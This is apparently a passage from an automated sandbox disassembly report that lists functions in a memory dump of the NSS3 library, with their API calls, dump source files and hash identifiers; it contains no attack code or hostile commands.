                                                                                                                                                                                                                            • Part of subcall function 6C4B5920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C4B5984
                                                                                                                                                                                                                            • Part of subcall function 6C4B5920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6C4B5999
                                                                                                                                                                                                                            • Part of subcall function 6C4B5920: free.MOZGLUE(00000000), ref: 6C4B59BA
                                                                                                                                                                                                                            • Part of subcall function 6C4B5920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6C4B59D3
                                                                                                                                                                                                                            • Part of subcall function 6C4B5920: free.MOZGLUE(00000000), ref: 6C4B59F5
                                                                                                                                                                                                                            • Part of subcall function 6C4B5920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6C4B5A0A
                                                                                                                                                                                                                            • Part of subcall function 6C4B5920: free.MOZGLUE(00000000), ref: 6C4B5A2E
                                                                                                                                                                                                                            • Part of subcall function 6C4B5920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6C4B5A43
                                                                                                                                                                                                                          • SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C4EB3
                                                                                                                                                                                                                            • Part of subcall function 6C4C4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C4C4EB8,?,?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C484C
                                                                                                                                                                                                                            • Part of subcall function 6C4C4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C4C4EB8,?,?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C486D
                                                                                                                                                                                                                            • Part of subcall function 6C4C4820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C4C4EB8,?), ref: 6C4C4884
                                                                                                                                                                                                                          • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C4EC0
                                                                                                                                                                                                                            • Part of subcall function 6C4C4470: TlsGetValue.KERNEL32(00000000,?,6C487296,00000000), ref: 6C4C4487
                                                                                                                                                                                                                            • Part of subcall function 6C4C4470: EnterCriticalSection.KERNEL32(?,?,?,6C487296,00000000), ref: 6C4C44A0
                                                                                                                                                                                                                            • Part of subcall function 6C4C4470: PR_Unlock.NSS3(?,?,?,?,6C487296,00000000), ref: 6C4C44BB
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C4F16
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C4F2E
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C4F40
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C4F6C
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C4F80
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C4F8F
                                                                                                                                                                                                                          • PK11_UpdateSlotAttribute.NSS3(?,6C59DCB0,00000000), ref: 6C4C4FFE
                                                                                                                                                                                                                          • PK11_UserDisableSlot.NSS3(0000001E), ref: 6C4C501F
                                                                                                                                                                                                                          • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C506B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 560490210-0
                                                                                                                                                                                                                          • Opcode ID: c64f7c710ce87e8d176b0a701da8deeebb42678f96b8a54836d2cad010331643
                                                                                                                                                                                                                          • Instruction ID: fec6ad715783ffef66338e84313217c14c5c2cfc5b80a54873538c41b8c1c695
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c64f7c710ce87e8d176b0a701da8deeebb42678f96b8a54836d2cad010331643
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA5103B9E002019BEB01DF25EC01EAA76B4EF0535EF150138EC0696B21FB31E915CAE7
                                                                                                                                                                                                                          Function 6C46ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 786543732-0
                                                                                                                                                                                                                          • Opcode ID: 4cb28613af993ede68c4c457c8409bf42864b8e0f06decce65a4ab1284eab00f
                                                                                                                                                                                                                          • Instruction ID: e4136dce846dc07b2b1b628d8241d503ebaf67a9ddac1e82fb0142ab584fcff0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4cb28613af993ede68c4c457c8409bf42864b8e0f06decce65a4ab1284eab00f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6519AB0A41A259BDF00DF9ADC45EAE77B5EF06359F050029E805A7F00D331BA45CBEA
                                                                                                                                                                                                                          Function 6C544C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • sqlite3_value_text16.NSS3(?), ref: 6C544CAF
                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C544CFD
                                                                                                                                                                                                                          • sqlite3_value_text16.NSS3(?), ref: 6C544D44
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: sqlite3_value_text16$sqlite3_log
                                                                                                                                                                                                                          • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                                                                                                                                                          • API String ID: 2274617401-4033235608
                                                                                                                                                                                                                          • Opcode ID: 6616b7fd87b92775a9e3805ba21952d50fe098e7fd2d1a2228ebbce1734ed3cb
                                                                                                                                                                                                                          • Instruction ID: abdb078b6f1cb5ac802598a5a5fa0d5719041f84daac4afad17d0cb2abfc312a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6616b7fd87b92775a9e3805ba21952d50fe098e7fd2d1a2228ebbce1734ed3cb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78319973EC4951A7E7088E24AC01BA973617792318F1AC529D8246BE58DF71AC5283E2
                                                                                                                                                                                                                          Function 6C542D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • sqlite3_initialize.NSS3 ref: 6C542D9F
                                                                                                                                                                                                                            • Part of subcall function 6C3FCA30: EnterCriticalSection.KERNEL32(?,?,?,6C45F9C9,?,6C45F4DA,6C45F9C9,?,?,6C42369A), ref: 6C3FCA7A
                                                                                                                                                                                                                            • Part of subcall function 6C3FCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C3FCB26
                                                                                                                                                                                                                          • sqlite3_exec.NSS3(?,?,6C542F70,?,?), ref: 6C542DF9
                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000), ref: 6C542E2C
                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C542E3A
                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C542E52
                                                                                                                                                                                                                          • sqlite3_mprintf.NSS3(6C5AAAF9,?), ref: 6C542E62
                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C542E70
                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C542E89
                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C542EBB
                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C542ECB
                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000), ref: 6C542F3E
                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C542F4C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1957633107-0
                                                                                                                                                                                                                          • Opcode ID: 271e1b058088762db63921a3c4da6a44167d0bb3780bcfb92f7a3c8769ab178d
                                                                                                                                                                                                                          • Instruction ID: 2d4ba5462b342d39908cd4c385044ac24f691e5486a6b83711685dc5f1761bec
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 271e1b058088762db63921a3c4da6a44167d0bb3780bcfb92f7a3c8769ab178d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4619FB5E002159BEB00CFA8DC85BAEB7B1AF58348F158428DC55E7701E735E856CFA1
                                                                                                                                                                                                                          Function 6C487C70 Relevance: 18.1, APIs: 12, Instructions: 141COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C5D2120,Function_00097E60,00000000,?,?,?,?,6C50067D,6C501C60,00000000), ref: 6C487C81
                                                                                                                                                                                                                            • Part of subcall function 6C3F4C70: TlsGetValue.KERNEL32(?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4C97
                                                                                                                                                                                                                            • Part of subcall function 6C3F4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CB0
                                                                                                                                                                                                                            • Part of subcall function 6C3F4C70: PR_Unlock.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CC9
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C487CA0
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C487CB4
                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C487CCF
                                                                                                                                                                                                                            • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
                                                                                                                                                                                                                            • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C487D04
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C487D1B
                                                                                                                                                                                                                          • realloc.MOZGLUE(-00000050), ref: 6C487D82
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C487DF4
                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C487E0E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2305085145-0
                                                                                                                                                                                                                          • Opcode ID: 69a72416769dc8239274cb2043758183e64b9b4e7dcff724383aa8ce74fd24d0
                                                                                                                                                                                                                          • Instruction ID: 5463acb8560592967cb40a37d0c4bf664bf96c12b4e201e520948492ddfff933
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 69a72416769dc8239274cb2043758183e64b9b4e7dcff724383aa8ce74fd24d0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8651F575B0A200DBDB01EF68CC54E6577F5FB42319F168129FD0487B22EB30E851CA99
                                                                                                                                                                                                                          Function 6C4D7870 Relevance: 18.1, APIs: 12, Instructions: 138stringmemorythreadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?,?,?,6C4D91C5), ref: 6C4D788F
                                                                                                                                                                                                                            • Part of subcall function 6C4D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C478298,?,?,?,6C46FCE5,?), ref: 6C4D07BF
                                                                                                                                                                                                                            • Part of subcall function 6C4D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C4D07E6
                                                                                                                                                                                                                            • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D081B
                                                                                                                                                                                                                            • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D0825
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000,?,?,6C4D91C5), ref: 6C4D78BB
                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6C4D91C5), ref: 6C4D78FA
                                                                                                                                                                                                                          • strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6C4D91C5), ref: 6C4D7930
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C4D91C5), ref: 6C4D7951
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C4D7964
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C4D797A
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C4D7988
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6C4D7998
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4D79A7
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6C4D91C5), ref: 6C4D79BB
                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3(?,?,?,?,6C4D91C5), ref: 6C4D79CA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Error$Alloc_HashLookupTablememcpy$ConstCurrentFindItem_ThreadZfreefreestrchrstrcmpstrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1862276529-0
                                                                                                                                                                                                                          • Opcode ID: 8fe294e77b7e5f8b582df8dd43d3464fd225205a1d73792af32ac44a99116ecf
                                                                                                                                                                                                                          • Instruction ID: 367f678168fe67a6680c86d7ad2236ae8eea98537c00b4dc20704b58f6d0490b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8fe294e77b7e5f8b582df8dd43d3464fd225205a1d73792af32ac44a99116ecf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7141E1B1A082019BFB10EB658C55F6B7BA8AF40249F260078F818D7B41E721F848C7E2
                                                                                                                                                                                                                          Function 6C3F4C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4C97
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CB0
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CC9
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4D11
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4D2A
                                                                                                                                                                                                                          • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4D4A
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4D57
                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4D97
                                                                                                                                                                                                                          • PR_Lock.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4DBA
                                                                                                                                                                                                                          • PR_WaitCondVar.NSS3 ref: 6C3F4DD4
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4DE6
                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4DEF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3388019835-0
                                                                                                                                                                                                                          • Opcode ID: 0e179037cf5a98cdaf7d4df863126fc5dd625a27a64363bf515a41e093b4bd1e
                                                                                                                                                                                                                          • Instruction ID: 2052eeb9d1768aaaa765d0733675a89cc7dedcc86daed1b2f777d25f2ce6f245
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e179037cf5a98cdaf7d4df863126fc5dd625a27a64363bf515a41e093b4bd1e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C94172B5A04725CFCB00AF78D984559B7B4BF05318F064A69E8589BB11E730E885CFD9
                                                                                                                                                                                                                          Function 6C498F70 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 152COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C498FAF
                                                                                                                                                                                                                          • PR_Now.NSS3(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C498FD1
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C498FFA
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C499013
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C499042
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C49905A
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C499073
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C4990EC
                                                                                                                                                                                                                            • Part of subcall function 6C460F00: PR_GetPageSize.NSS3(6C460936,FFFFE8AE,?,6C3F16B7,00000000,?,6C460936,00000000,?,6C3F204A), ref: 6C460F1B
                                                                                                                                                                                                                            • Part of subcall function 6C460F00: PR_NewLogModule.NSS3(clock,6C460936,FFFFE8AE,?,6C3F16B7,00000000,?,6C460936,00000000,?,6C3F204A), ref: 6C460F25
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C499111
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Unlock$CriticalEnterSectionValue$InternalK11_ModulePageSizeSlot
                                                                                                                                                                                                                          • String ID: nXl
                                                                                                                                                                                                                          • API String ID: 2831689957-2538165799
